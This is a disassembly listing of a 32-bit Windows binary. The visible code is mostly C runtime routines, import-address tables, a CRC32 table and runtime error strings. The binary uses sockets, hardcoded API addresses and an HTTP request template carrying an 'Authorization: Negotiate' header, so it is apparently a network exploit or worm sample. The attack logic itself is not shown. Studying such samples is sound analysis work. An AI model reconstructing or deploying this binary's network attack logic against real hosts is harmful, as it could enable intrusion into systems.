jnz short loc_422F8E
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_424028 ; GetStringTypeW
jmp loc_4230B6
; ---------------------------------------------------------------------------
loc_422F8E: ; CODE XREF: sub_422F03+72�j
cmp eax, 2
jnz loc_4230B4
cmp [ebp+arg_10], edi
jnz short loc_422FA4
mov eax, ds:dword_48A0B8
mov [ebp+arg_10], eax
loc_422FA4: ; CODE XREF: sub_422F03+97�j
push edi
push edi
push edi
push edi
push [ebp+arg_8]
push [ebp+arg_4]
push 220h
push [ebp+arg_10]
call ds:dword_424150 ; WideCharToMultiByte
mov esi, eax
mov [ebp+var_28], esi
cmp esi, edi
jz loc_4230B4
mov [ebp+var_4], edi
add eax, 3
and al, 0FCh
call sub_417B30
mov [ebp+var_18], esp
mov eax, esp
mov [ebp+var_2C], eax
push esi
push edi
push eax
call sub_417330
add esp, 0Ch
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_423002
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
xor edi, edi
mov [ebp+var_2C], edi
or [ebp+var_4], 0FFFFFFFFh
mov esi, [ebp+var_28]
loc_423002: ; CODE XREF: sub_422F03+EA�j
cmp [ebp+var_2C], edi
jz loc_4230B4
push edi
push edi
push esi
push [ebp+var_2C]
push [ebp+arg_8]
push [ebp+arg_4]
push 220h
push [ebp+arg_10]
call ds:dword_424150 ; WideCharToMultiByte
test eax, eax
jz loc_4230B4
mov [ebp+var_4], 1
lea eax, [esi+esi+2]
add eax, 3
and al, 0FCh
call sub_417B30
mov [ebp+var_18], esp
mov ebx, esp
mov [ebp+var_24], ebx
jmp short loc_423057
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
xor edi, edi
xor ebx, ebx
loc_423057: ; CODE XREF: sub_422F03+147�j
or [ebp+var_4], 0FFFFFFFFh
cmp ebx, edi
jz short loc_4230B4
mov eax, [ebp+arg_14]
cmp eax, edi
jnz short loc_42306B
mov eax, ds:dword_48A0A8
loc_42306B: ; CODE XREF: sub_422F03+161�j
mov ecx, [ebp+arg_8]
lea edi, [ecx+ecx]
lea esi, [edi+ebx]
or word ptr [esi], 0FFFFh
or word ptr [esi-2], 0FFFFh
push ebx
push [ebp+var_28]
push [ebp+var_2C]
push [ebp+arg_0]
push eax
call ds:dword_42402C ; GetStringTypeA
mov [ebp+var_20], eax
cmp word ptr [esi-2], 0FFFFh
jz short loc_4230B4
cmp word ptr [esi], 0FFFFh
jnz short loc_4230B4
push edi
push ebx
push [ebp+arg_C]
call sub_4182C0
add esp, 0Ch
mov eax, [ebp+var_20]
jmp short loc_4230B6
; ---------------------------------------------------------------------------
loc_4230B4: ; CODE XREF: sub_422F03+61�j
; sub_422F03+8E�j ...
xor eax, eax
loc_4230B6: ; CODE XREF: sub_422F03+86�j
; sub_422F03+1AF�j
lea esp, [ebp-38h]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_422F03 endp
; =============== S U B R O U T I N E =======================================
sub_4230C8 proc near ; DATA XREF: _1:00424F14�o
; FUNCTION CHUNK AT 0040445C SIZE 00000008 BYTES
lea ecx, [ebp-38h]
jmp loc_40445C
sub_4230C8 endp
; ---------------------------------------------------------------------------
mov eax, [ebp-20h]
and eax, 1
test eax, eax
jz locret_4230E6
mov ecx, [ebp+8]
jmp loc_40445C
; ---------------------------------------------------------------------------
locret_4230E6: ; CODE XREF: _0:004230D8�j
retn
; ---------------------------------------------------------------------------
loc_4230E7: ; DATA XREF: sub_404032�o
mov eax, offset dword_424EE8
jmp loc_417F4B
; ---------------------------------------------------------------------------
align 4
lea ecx, [ebp+14h]
jmp loc_40445C
; ---------------------------------------------------------------------------
loc_4230FC: ; DATA XREF: _1:00424F44�o
lea ecx, [ebp-1Ch]
jmp loc_40445C
; ---------------------------------------------------------------------------
loc_423104: ; DATA XREF: sub_4041D4�o
mov eax, offset dword_424F18
jmp loc_417F4B
; ---------------------------------------------------------------------------
align 10h
loc_423110: ; DATA XREF: sub_40473F�o
mov eax, offset dword_424F48
jmp loc_417F4B
; ---------------------------------------------------------------------------
mov ecx, [ebp-14h]
jmp sub_422BA6
; ---------------------------------------------------------------------------
loc_423122: ; DATA XREF: sub_4227EE�o
mov eax, offset dword_424FA8
jmp loc_417F4B
; ---------------------------------------------------------------------------
lea ecx, [ebp-20h]
jmp loc_40445C
; ---------------------------------------------------------------------------
loc_423134: ; DATA XREF: sub_422863�o
mov eax, offset dword_425040
jmp loc_417F4B
; ---------------------------------------------------------------------------
mov ecx, [ebp-14h]
jmp sub_422BA6
; ---------------------------------------------------------------------------
loc_423146: ; DATA XREF: sub_4228C0�o
mov eax, offset dword_425064
jmp loc_417F4B
; ---------------------------------------------------------------------------
mov ecx, [ebp-10h]
jmp sub_422BA6
; ---------------------------------------------------------------------------
loc_423158: ; DATA XREF: sub_422908�o
mov eax, offset dword_425088
jmp loc_417F4B
; ---------------------------------------------------------------------------
lea ecx, [ebp-20h]
jmp loc_40445C
; ---------------------------------------------------------------------------
loc_42316A: ; DATA XREF: sub_42298A�o
mov eax, offset dword_4250E8
jmp loc_417F4B
_0 ends
; Section 2. (virtual address 00024000)
; Virtual size : 00001C3C ( 7228.)
; Section size in file : 00001C3C ( 7228.)
; Offset to raw data for section: 00024000
; Flags E0000040: Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
_1 segment para public 'CODE' use32
assume cs:_1
;org 424000h
assume es:nothing, ss:nothing, ds:_0, fs:nothing, gs:nothing
off_424000 dd offset sub_49C51C ; DATA XREF: sub_40AAFA+36�r
dword_424004 dd 77E6BD68h ; DATA XREF: sub_422492+173�r
dword_424008 dd 77E77F2Eh ; DATA XREF: sub_4221EA+3E�r
; sub_4221EA+261�r
dword_42400C dd 77E762D0h ; DATA XREF: sub_4221EA+5B�r
; sub_4221EA+B9�r
dword_424010 dd 77E70192h ; DATA XREF: sub_4211F1+F9�r
dword_424014 dd 77E7176Ch ; DATA XREF: sub_42090A+8�r
dword_424018 dd 77E7339Ch ; DATA XREF: sub_4208D2+C�r
off_42401C dd offset sub_49AC54 ; DATA XREF: sub_4208B4+5�r
; sub_4208C5+6�r
dword_424020 dd 77E73FF9h ; DATA XREF: sub_41FE6F+2C�r
dword_424024 dd 77E7FF2Eh ; DATA XREF: sub_41FD41:loc_41FD91�r
; sub_41FDB8:loc_41FE0B�r
dword_424028 dd 77E7C866h ; DATA XREF: sub_41FB63+3F�r
; sub_41FB63+12D�r ...
dword_42402C dd 77E641EBh ; DATA XREF: sub_41FB63+59�r
; sub_41FB63+8D�r ...
dword_424030 dd 77E78406h ; DATA XREF: sub_41F5BF+FF�r
; sub_41F5BF+166�r ...
dword_424034 dd 77E79C3Dh ; DATA XREF: sub_41F5BF+158�r
; sub_41F885+143�r
dword_424038 dd 77E7C931h ; DATA XREF: sub_41F5BF+19D�r
dword_42403C dd 77E77EE1h ; DATA XREF: sub_41F48D+9�r
dword_424040 dd 77E67702h ; DATA XREF: sub_41F48D:loc_41F4BC�r
; sub_41F48D+E1�r
dword_424044 dd 77E7C9E1h ; DATA XREF: sub_41F48D+CE�r
dword_424048 dd 77E9C5B1h ; DATA XREF: sub_41F48D+11F�r
dword_42404C dd 77EB9A84h ; DATA XREF: sub_41EFAB+138�r
dword_424050 dd 77E6C703h ; DATA XREF: sub_41EAC6+1A�r
dword_424054 dd 77E73C49h ; DATA XREF: sub_401000+AD�r
; sub_40144A+95�r ...
dword_424058 dd 77E7751Ah ; DATA XREF: sub_401000+27�r
; sub_40144A+1A6�r ...
dword_42405C dd 77E802FCh ; DATA XREF: sub_4010B5+18C�r
; sub_4010B5+2D4�r ...
dword_424060 dd 77E6D75Bh ; DATA XREF: sub_4010B5+182�r
; sub_401A76+FF�r
dword_424064 dd 77E61BE6h ; DATA XREF: sub_4018D0+9A�r
; sub_4023A7+5D�r ...
dword_424068 dd 77E704FCh ; DATA XREF: sub_4022C6+20�r
; sub_40B8D8+183�r ...
dword_42406C dd 77E70F89h ; DATA XREF: sub_4022C6+E�r
; sub_40BF6D+D�r ...
dword_424070 dd 77E77CCEh ; DATA XREF: sub_4029E9+66�r
; sub_402ACC+65�r ...
off_424074 dd offset sub_49C3FC ; DATA XREF: sub_402DD7+135�r
; sub_40494F+1A9�r ...
off_424078 dd offset sub_49C3D5 ; DATA XREF: sub_402DD7+120�r
; sub_402DD7+150�r ...
dword_42407C dd 77E79D8Ch ; DATA XREF: sub_402DD7+103�r
; sub_404861+94�r ...
dword_424080 dd 77E73EACh ; DATA XREF: sub_402DD7+E9�r
off_424084 dd offset sub_49C2B0 ; DATA XREF: sub_402DD7+68�r
; sub_40494F+A7�r ...
dword_424088 dd 77E79D5Bh ; DATA XREF: sub_40494F+4BC�r
; sub_40E6A9+68�r ...
dword_42408C dd 77F5157Dh ; DATA XREF: sub_40494F+4A3�r
; sub_4060D0+289�r ...
dword_424090 dd 77E737DEh ; DATA XREF: sub_40494F+43A�r
off_424094 dd offset sub_49BA24 ; DATA XREF: sub_405A58+18�r
; sub_407252+58�r ...
dword_424098 dd 77E64106h ; DATA XREF: sub_405F4D+A0�r
; sub_40B8D8+1B6�r
dword_42409C dd 77E64006h ; DATA XREF: sub_405F4D+8C�r
; sub_40B8D8+19F�r
dword_4240A0 dd 77E7AC37h ; DATA XREF: sub_4060D0+254�r
; sub_407252+10E�r ...
off_4240A4 dd offset sub_49B9EC ; DATA XREF: sub_4060D0+1F5�r
; sub_406A0D+38�r ...
off_4240A8 dd offset sub_49B7AF ; DATA XREF: sub_4060D0+110�r
; sub_40AC42+10F�r ...
off_4240AC dd offset sub_49B5FF ; DATA XREF: sub_406387+5EC�r
; sub_408EE5+C0�r ...
dword_4240B0 dd 77E79424h ; DATA XREF: sub_406387+280�r
; sub_409392+135�r
dword_4240B4 dd 77E794BFh ; DATA XREF: sub_406387+272�r
; sub_409392+123�r
off_4240B8 dd offset sub_49B626 ; DATA XREF: sub_406387+212�r
; sub_406387+5DB�r ...
off_4240BC dd offset sub_49B334 ; DATA XREF: sub_406387+201�r
; sub_408EE5+26�r
off_4240C0 dd offset sub_49C460 ; DATA XREF: sub_406A0D+6C�r
; sub_40C512+259�r ...
dword_4240C4 dd 77F7E300h ; DATA XREF: sub_407767+142�r
dword_4240C8 dd 77F7E21Fh ; DATA XREF: sub_407767+D7�r
dword_4240CC dd 77E7C706h ; DATA XREF: sub_40797F+77�r
dword_4240D0 dd 77F53275h ; DATA XREF: sub_40797F+6B�r
; sub_40797F+22F�r
off_4240D4 dd offset sub_49C18D ; DATA XREF: sub_409037+170�r
dword_4240D8 dd 77E78147h ; DATA XREF: sub_409037+BC�r
off_4240DC dd offset sub_49C076 ; DATA XREF: sub_409037+60�r
; sub_40981F+11�r ...
off_4240E0 dd offset sub_49BE83 ; DATA XREF: sub_409037+5A�r
; sub_40981F+13A�r ...
dword_4240E4 dd 77F51597h ; DATA XREF: sub_409209+41�r
; sub_409209+F5�r ...
dword_4240E8 dd 77F516F8h ; DATA XREF: sub_409209+21�r
; sub_409392+4A�r ...
dword_4240EC dd 77E77CB7h ; DATA XREF: sub_409209+10�r
; sub_409392+40�r ...
dword_4240F0 dd 77E7F01Ah ; DATA XREF: sub_409392+88�r
; sub_409539+55�r
dword_4240F4 dd 77E61A54h ; DATA XREF: sub_409392+56�r
; sub_409539+97�r
dword_4240F8 dd 77E7C3A5h ; DATA XREF: sub_409392+34�r
; sub_409539+2E�r
dword_4240FC dd 77E706B7h ; DATA XREF: sub_409392+15�r
; sub_409539+13�r ...
off_424100 dd offset sub_49BF8C ; DATA XREF: sub_40981F+2�r
; sub_40AC42+FB�r ...
dword_424104 dd 77E76A60h ; DATA XREF: sub_40AA35+2D�r
dword_424108 dd 77E71B14h ; DATA XREF: sub_40AABF+26�r
dword_42410C dd 77E7166Fh ; DATA XREF: sub_40AABF+1D�r
off_424110 dd offset sub_49C55B ; DATA XREF: sub_40AAFA+69�r
off_424114 dd offset sub_49C4A4 ; DATA XREF: sub_40AAFA+25�r
dword_424118 dd 77E7011Ah ; DATA XREF: sub_40AB7C+96�r
dword_42411C dd 77E73CE2h ; DATA XREF: sub_40AB7C+60�r
dword_424120 dd 77E61BB8h ; DATA XREF: sub_40AC42+17E�r
; sub_40B56C+F0�r ...
dword_424124 dd 77E668D9h ; DATA XREF: sub_40AC42+15D�r
dword_424128 dd 77E70396h ; DATA XREF: sub_40AC42+126�r
; sub_40E6A9+1B5�r ...
dword_42412C dd 77E6AD34h ; DATA XREF: sub_40AC42+35�r
; sub_40EE72+3E60�r
dword_424130 dd 77E7FF65h ; DATA XREF: sub_40B417+5A�r
dword_424134 dd 77EB7624h ; DATA XREF: sub_40B417+3D�r
dword_424138 dd 77E79CE3h ; DATA XREF: sub_40B56C+91�r
; sub_41680E+77�r
dword_42413C dd 77E79C90h ; DATA XREF: sub_40B56C+79�r
; sub_41511D+C�r ...
dword_424140 dd 77E7727Ah ; DATA XREF: sub_40B56C+3B�r
; sub_416715+23�r
dword_424144 dd 77E7C657h ; DATA XREF: sub_40B78A+1D�r
; sub_40B8D8+24�r ...
dword_424148 dd 77E76C1Ah ; DATA XREF: sub_40B8D8+1CF�r
off_42414C dd offset sub_49B0C8 ; DATA XREF: sub_40CAF1+478�r
; sub_40D3A5+DF�r ...
dword_424150 dd 77E79924h ; DATA XREF: sub_40DBB0+13�r
; sub_41E709+20D�r ...
dword_424154 dd 77E65F4Ch ; DATA XREF: sub_40E5EB+34�r
; _0:00415A68�r
dword_424158 dd 77E73628h ; DATA XREF: sub_40E6A9+329�r
; sub_40EE72+4AC7�r ...
dword_42415C dd 77E80656h ; DATA XREF: sub_40E6A9+258�r
dword_424160 dd 77E6BD13h ; DATA XREF: sub_40E6A9:loc_40E864�r
dword_424164 dd 77E7C2C4h ; DATA XREF: sub_40E6A9+61�r
dword_424168 dd 77E75CEBh ; DATA XREF: sub_40EE72+4D38�r
; sub_4165C4+9F�r ...
dword_42416C dd 77E71AFEh ; DATA XREF: sub_40EE72+3C5B�r
dword_424170 dd 77E616B4h ; DATA XREF: sub_415188+184�r
; sub_415417+1F�r ...
dword_424174 dd 77E76968h ; DATA XREF: sub_41570C+5F�r
dword_424178 dd 77E7513Ch ; DATA XREF: _0:00415AFF�r
dword_42417C dd 77E6C29Dh ; DATA XREF: sub_4162AA+1EB�r
dword_424180 dd 77E74C59h ; DATA XREF: sub_4165C4+C7�r
dword_424184 dd 77EC7C51h ; DATA XREF: sub_416999+5E�r
dword_424188 dd 77F6183Eh ; DATA XREF: sub_422A4C�r
dword_42418C dd 77E76E3Dh ; DATA XREF: sub_4186B1+6C�r
; sub_42094E+38�r
dword_424190 dd 77E61608h ; DATA XREF: sub_4186B1+17�r
dword_424194 dd 77F5722Fh ; DATA XREF: sub_41944F+110�r
; sub_41944F+22D�r ...
dword_424198 dd 77E6177Ah ; DATA XREF: _0:00419C83�r
; sub_41F5BF+59�r
dword_42419C dd 77E7C938h ; DATA XREF: _0:00419C58�r
dword_4241A0 dd 77E7C486h ; DATA XREF: _0:00419C0A�r
dword_4241A4 dd 77E7AC5Eh ; DATA XREF: sub_41AB9C+54�r
dword_4241A8 dd 77E76E0Bh ; DATA XREF: sub_41ACE4+50�r
dword_4241AC dd 77E7C726h ; DATA XREF: sub_41ACE4+11�r
dword_4241B0 dd 77E79E34h ; DATA XREF: sub_41ADB4+240�r
; sub_41B888+120�r ...
dword_4241B4 dd 77E7980Ah ; DATA XREF: sub_41B3E6+76�r
; sub_41B497+51�r ...
dword_4241B8 dd 77E73196h ; DATA XREF: sub_4208EE+C�r
dword_4241BC dd 77E6D706h ; DATA XREF: sub_41C040+215�r
; sub_422BC9+2E�r
dword_4241C0 dd 77F522F2h ; DATA XREF: sub_41D5A8+58�r
dword_4241C4 dd 77E77405h ; DATA XREF: sub_41E709+5E�r
; sub_41E709+A7�r ...
dword_4241C8 dd 77E781F9h ; DATA XREF: sub_41E709+42�r
; sub_41E709+14D�r ...
dword_4241CC dd 77E7849Fh ; DATA XREF: sub_41E92D+48�r
; sub_41EB6C+14�r ...
dword_4241D0 dd 77E7A13Fh ; DATA XREF: sub_41EAC6+2F�r
align 8
dword_4241D8 dd 71B2ACCBh ; DATA XREF: sub_422A40�r
align 10h
dword_4241E0 dd 71AB41DAh ; DATA XREF: sub_4053D5+47�r
; sub_4059DB+15�r
dword_4241E4 dd 71AB3F8Dh ; DATA XREF: sub_4053D5+8D�r
dword_4241E8 dd 71AB3ECEh ; DATA XREF: sub_4053D5+C4�r
dword_4241EC dd 71AB5DE2h ; DATA XREF: sub_4053D5+D8�r
dword_4241F0 dd 71AB868Dh ; DATA XREF: sub_4053D5+180�r
dword_4241F4 dd 71AB8629h ; DATA XREF: _0:004053C1�r
dword_4241F8 dd 71AB2BBFh ; DATA XREF: _0:0040528E�r
dword_4241FC dd 71AB12F8h ; DATA XREF: sub_404E54+27�r
; sub_404F9A+27�r ...
dword_424200 dd 71AB1836h ; DATA XREF: sub_4059DB+6E�r
; sub_405A58+8E�r
dword_424204 dd 71AB5690h ; DATA XREF: sub_404E54+6A�r
; sub_404F9A+6A�r ...
dword_424208 dd 71AB1AF4h ; DATA XREF: sub_403F94+12�r
; sub_404E54+C3�r ...
dword_42420C dd 71AB1890h ; DATA XREF: sub_403DF6+4C�r
; sub_4053D5+115�r
dword_424210 dd 71AB1B7Bh ; DATA XREF: sub_422A46�r
dword_424214 dd 71AB3C22h ; DATA XREF: sub_4018D0+59�r
; _0:0040433C�r ...
dword_424218 dd 71AB155Ah ; DATA XREF: sub_4018D0+70�r
; sub_4053D5+9D�r
dword_42421C dd 71AB3E5Dh ; DATA XREF: sub_4018D0+8C�r
; sub_404E54+59�r ...
dword_424220 dd 71AB1A6Dh ; DATA XREF: sub_4018D0+AA�r
; sub_404E54+E0�r ...
dword_424224 dd 71AB1746h ; DATA XREF: sub_404E54+36�r
; sub_404F9A+36�r ...
align 10h
aGetHttp1_0Host db 'GET / HTTP/1.0',0Dh,0Ah ; DATA XREF: sub_4041D4+62�o
db 'Host: %s',0Dh,0Ah
db 'Authorization: Negotiate %s',0Dh,0Ah
db 0Dh,0Ah,0
align 10h
dbl_424270 dq 1.388888888888889e-2 ; DATA XREF: sub_403FE6+2F�r
dbl_424278 dq 1.666666666666667e-1 ; DATA XREF: sub_403FE6+15�r
dword_424280 dd 0FFFFFFFFh ; DATA XREF: sub_404032+16F�r
; sub_404464�r ...
align 8
dbl_424288 dq 1.333333333333333 ; DATA XREF: sub_404032+79�r
dword_424290 dd 0 ; DATA XREF: sub_4041D4+4D�o
; sub_404514+5B�o ...
flt_424294 dd 5.0e-1 ; DATA XREF: sub_40494F+398�r
dword_424298 dd 0 ; DATA XREF: sub_40C21E+26�r
dd 77073096h, 0EE0E612Ch, 990951BAh, 76DC419h, 706AF48Fh
dd 0E963A535h, 9E6495A3h, 0EDB8832h, 79DCB8A4h, 0E0D5E91Eh
dd 97D2D988h, 9B64C2Bh, 7EB17CBDh, 0E7B82D07h, 90BF1D91h
dd 1DB71064h, 6AB020F2h, 0F3B97148h, 84BE41DEh, 1ADAD47Dh
dd 6DDDE4EBh, 0F4D4B551h, 83D385C7h, 136C9856h, 646BA8C0h
dd 0FD62F97Ah, 8A65C9ECh, 14015C4Fh, 63066CD9h, 0FA0F3D63h
dd 8D080DF5h, 3B6E20C8h, 4C69105Eh, 0D56041E4h, 0A2677172h
dd 3C03E4D1h, 4B04D447h, 0D20D85FDh, 0A50AB56Bh, 35B5A8FAh
dd 42B2986Ch, 0DBBBC9D6h, 0ACBCF940h, 32D86CE3h, 45DF5C75h
dd 0DCD60DCFh, 0ABD13D59h, 26D930ACh, 51DE003Ah, 0C8D75180h
dd 0BFD06116h, 21B4F4B5h, 56B3C423h, 0CFBA9599h, 0B8BDA50Fh
dd 2802B89Eh, 5F058808h, 0C60CD9B2h, 0B10BE924h, 2F6F7C87h
dd 58684C11h, 0C1611DABh, 0B6662D3Dh, 76DC4190h, 1DB7106h
dd 98D220BCh, 0EFD5102Ah, 71B18589h, 6B6B51Fh, 9FBFE4A5h
dd 0E8B8D433h, 7807C9A2h, 0F00F934h, 9609A88Eh, 0E10E9818h
dd 7F6A0DBBh, 86D3D2Dh, 91646C97h, 0E6635C01h, 6B6B51F4h
dd 1C6C6162h, 856530D8h, 0F262004Eh, 6C0695EDh, 1B01A57Bh
dd 8208F4C1h, 0F50FC457h, 65B0D9C6h, 12B7E950h, 8BBEB8EAh
dd 0FCB9887Ch, 62DD1DDFh, 15DA2D49h, 8CD37CF3h, 0FBD44C65h
dd 4DB26158h, 3AB551CEh, 0A3BC0074h, 0D4BB30E2h, 4ADFA541h
dd 3DD895D7h, 0A4D1C46Dh, 0D3D6F4FBh, 4369E96Ah, 346ED9FCh
dd 0AD678846h, 0DA60B8D0h, 44042D73h, 33031DE5h, 0AA0A4C5Fh
dd 0DD0D7CC9h, 5005713Ch, 270241AAh, 0BE0B1010h, 0C90C2086h
dd 5768B525h, 206F85B3h, 0B966D409h, 0CE61E49Fh, 5EDEF90Eh
dd 29D9C998h, 0B0D09822h, 0C7D7A8B4h, 59B33D17h, 2EB40D81h
dd 0B7BD5C3Bh, 0C0BA6CADh, 0EDB88320h, 9ABFB3B6h, 3B6E20Ch
dd 74B1D29Ah, 0EAD54739h, 9DD277AFh, 4DB2615h, 73DC1683h
dd 0E3630B12h, 94643B84h, 0D6D6A3Eh, 7A6A5AA8h, 0E40ECF0Bh
dd 9309FF9Dh, 0A00AE27h, 7D079EB1h, 0F00F9344h, 8708A3D2h
dd 1E01F268h, 6906C2FEh, 0F762575Dh, 806567CBh, 196C3671h
dd 6E6B06E7h, 0FED41B76h, 89D32BE0h, 10DA7A5Ah, 67DD4ACCh
dd 0F9B9DF6Fh, 8EBEEFF9h, 17B7BE43h, 60B08ED5h, 0D6D6A3E8h
dd 0A1D1937Eh, 38D8C2C4h, 4FDFF252h, 0D1BB67F1h, 0A6BC5767h
dd 3FB506DDh, 48B2364Bh, 0D80D2BDAh, 0AF0A1B4Ch, 36034AF6h
dd 41047A60h, 0DF60EFC3h, 0A867DF55h, 316E8EEFh, 4669BE79h
dd 0CB61B38Ch, 0BC66831Ah, 256FD2A0h, 5268E236h, 0CC0C7795h
dd 0BB0B4703h, 220216B9h, 5505262Fh, 0C5BA3BBEh, 0B2BD0B28h
dd 2BB45A92h, 5CB36A04h, 0C2D7FFA7h, 0B5D0CF31h, 2CD99E8Bh
dd 5BDEAE1Dh, 9B64C2B0h, 0EC63F226h, 756AA39Ch, 26D930Ah
dd 9C0906A9h, 0EB0E363Fh, 72076785h, 5005713h, 95BF4A82h
dd 0E2B87A14h, 7BB12BAEh, 0CB61B38h, 92D28E9Bh, 0E5D5BE0Dh
dd 7CDCEFB7h, 0BDBDF21h, 86D3D2D4h, 0F1D4E242h, 68DDB3F8h
dd 1FDA836Eh, 81BE16CDh, 0F6B9265Bh, 6FB077E1h, 18B74777h
dd 88085AE6h, 0FF0F6A70h, 66063BCAh, 11010B5Ch, 8F659EFFh
dd 0F862AE69h, 616BFFD3h, 166CCF45h, 0A00AE278h, 0D70DD2EEh
dd 4E048354h, 3903B3C2h, 0A7672661h, 0D06016F7h, 4969474Dh
dd 3E6E77DBh, 0AED16A4Ah, 0D9D65ADCh, 40DF0B66h, 37D83BF0h
dd 0A9BCAE53h, 0DEBB9EC5h, 47B2CF7Fh, 30B5FFE9h, 0BDBDF21Ch
dd 0CABAC28Ah, 53B39330h, 24B4A3A6h, 0BAD03605h, 0CDD70693h
dd 54DE5729h, 23D967BFh, 0B3667A2Eh, 0C4614AB8h, 5D681B02h
dd 2A6F2B94h, 0B40BBE37h, 0C30C8EA1h, 5A05DF1Bh, 2D02EF8Dh
dbl_424698 dq 9.765625e-4 ; DATA XREF: sub_40CAF1+2BD�r
; sub_40CAF1+2D8�r ...
dbl_4246A0 dq -3.0517578125e-5 ; DATA XREF: sub_41544E+1E�r
dbl_4246A8 dq 1.0 ; DATA XREF: sub_417CA4+6C�r
; sub_417DEB+6C�r ...
dword_4246B0 dd 0FFFFFFFFh, 419CBBh, 419CCFh ; DATA XREF: _0:00419BE9�o
byte_4246BC db 6 ; DATA XREF: sub_419E38:loc_419E8F�r
db 2 dup(0), 6
dd 100h, 6030010h, 10020600h, 45454504h, 5050505h, 303505h
dd 50h, 38282000h, 8075850h, 30303700h, 75057h, 8202000h
dd 0
dd 60686008h, 606060h, 78707000h, 8787878h, 807h, 8080007h
dd 8000008h, 7000800h, 8
aNull: ; DATA XREF: _2:off_43959C�o
unicode 0, <(null)>,0
align 4
aNull_0 db '(null)',0 ; DATA XREF: _2:off_439598�o
align 10h
a__global_heap_ db '__GLOBAL_HEAP_SELECTED',0 ; DATA XREF: sub_41AB9C+8E�o
align 4
a__msvcrt_heap_ db '__MSVCRT_HEAP_SELECT',0 ; DATA XREF: sub_41AB9C+4F�o
align 10h
a_yn db '_yn',0
a_y1 db '_y1',0
a_y0 db '_y0',0
aFrexp db 'frexp',0
align 4
aFmod db 'fmod',0
align 4
a_hypot db '_hypot',0
align 4
a_cabs db '_cabs',0
align 4
aLdexp db 'ldexp',0
align 4
aModf db 'modf',0
align 4
aFabs db 'fabs',0
align 4
aFloor db 'floor',0
align 4
aCeil db 'ceil',0
align 4
aTan db 'tan',0
aCos db 'cos',0
aSin db 'sin',0
aSqrt db 'sqrt',0
align 4
aAtan2 db 'atan2',0
align 10h
aAtan db 'atan',0
align 4
aAcos db 'acos',0
align 10h
aAsin db 'asin',0
align 4
aTanh db 'tanh',0
align 10h
aCosh db 'cosh',0
align 4
aSinh db 'sinh',0
align 10h
aLog10 db 'log10',0
align 4
aLog db 'log',0
aPow db 'pow',0
aExp db 'exp',0 ; DATA XREF: _2:off_43B7EC�o
align 8
dbl_424818 dq 0.0 ; DATA XREF: sub_41C2F3+8C�r
; sub_41C2F3+AC�r ...
dbl_424820 dq 4.195835e6 ; DATA XREF: sub_41C808+F�r
dbl_424828 dq 3.145727e6 ; DATA XREF: sub_41C808+6�r
aIsprocessorfea db 'IsProcessorFeaturePresent',0 ; DATA XREF: sub_41C846+F�o
align 4
aKernel32 db 'KERNEL32',0 ; DATA XREF: sub_41C846�o
align 4
aE000 db 'e+000',0 ; DATA XREF: sub_41C96D+93�o
align 10h
dword_424860 dd 0FFFFFFFFh, 41D058h, 41D062h, 0 ; DATA XREF: sub_41CFF1+5�o
dword_424870 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_41D120+5�o
dd offset loc_41D1DE
align 10h
dd offset sub_41D1BC
dd offset sub_41D1C6
dword_424888 dd 0FFFFFFFFh, 41D40Eh, 41D412h, 0 ; DATA XREF: sub_41D256+5�o
dword_424898 dd 0FFFFFFFFh, 41D470h, 41D479h, 0 ; DATA XREF: sub_41D41A+5�o
dword_4248A8 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_41D4FC+5�o
dd offset loc_41D54D
align 8
dd offset loc_41D539
dd offset loc_41D53D
dword_4248C0 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_41D552+5�o
dd offset loc_41D5A3
align 10h
dd offset loc_41D58F
dd offset loc_41D593
dword_4248D8 dd 2 dup(0) ; DATA XREF: sub_41E709+36�o
; sub_41FB63+39�o ...
dword_4248E0 dd 0FFFFFFFFh, 41E819h, 41E81Dh, 0FFFFFFFFh, 41E8CDh, 41E8D1h
; DATA XREF: sub_41E709+5�o
dd 746E7572h, 20656D69h, 6F727265h, 2072h, 534F4C54h, 72652053h
dd 0D726F72h, 0Ah, 474E4953h, 72726520h, 0A0D726Fh, 0
dd 414D4F44h, 65204E49h, 726F7272h, 0A0Dh, 32303652h, 2D0A0D38h
dd 616E7520h, 20656C62h, 69206F74h, 6974696Eh, 7A696C61h
dd 65682065h, 0A0D7061h, 0
aR6027NotEnough db 'R6027',0Dh,0Ah
db '- not enough space for lowio initialization',0Dh,0Ah,0
align 4
aR6026NotEnough db 'R6026',0Dh,0Ah
db '- not enough space for stdio initialization',0Dh,0Ah,0
align 10h
aR6025PureVirtu db 'R6025',0Dh,0Ah
db '- pure virtual function call',0Dh,0Ah,0
align 4
aR6024NotEnough db 'R6024',0Dh,0Ah
db '- not enough space for _onexit/atexit table',0Dh,0Ah,0
align 10h
aR6019UnableToO db 'R6019',0Dh,0Ah
db '- unable to open console device',0Dh,0Ah,0
align 4
aR6018Unexpecte db 'R6018',0Dh,0Ah
db '- unexpected heap error',0Dh,0Ah,0
align 10h
aR6017Unexpecte db 'R6017',0Dh,0Ah
db '- unexpected multithread lock error',0Dh,0Ah,0
align 10h
aR6016NotEnough db 'R6016',0Dh,0Ah
db '- not enough space for thread data',0Dh,0Ah,0
aAbnormalProgra db 0Dh,0Ah
db 'abnormal program termination',0Dh,0Ah,0
align 10h
aR6009NotEnough db 'R6009',0Dh,0Ah
db '- not enough space for environment',0Dh,0Ah,0
aR6008NotEnough db 'R6008',0Dh,0Ah
db '- not enough space for arguments',0Dh,0Ah,0
align 4
aR6002FloatingP db 'R6002',0Dh,0Ah ; DATA XREF: _2:off_43BC2C�o
db '- floating point not loaded',0Dh,0Ah,0
align 10h
aMicrosoftVisua db 'Microsoft Visual C++ Runtime Library',0 ; DATA XREF: sub_41F885+119�o
align 4
asc_424BA8 db 0Ah ; DATA XREF: sub_41F885+F1�o
db 0Ah,0
align 4
aRuntimeErrorPr db 'Runtime Error!',0Ah ; DATA XREF: sub_41F885+D3�o
db 0Ah
db 'Program: ',0
align 4
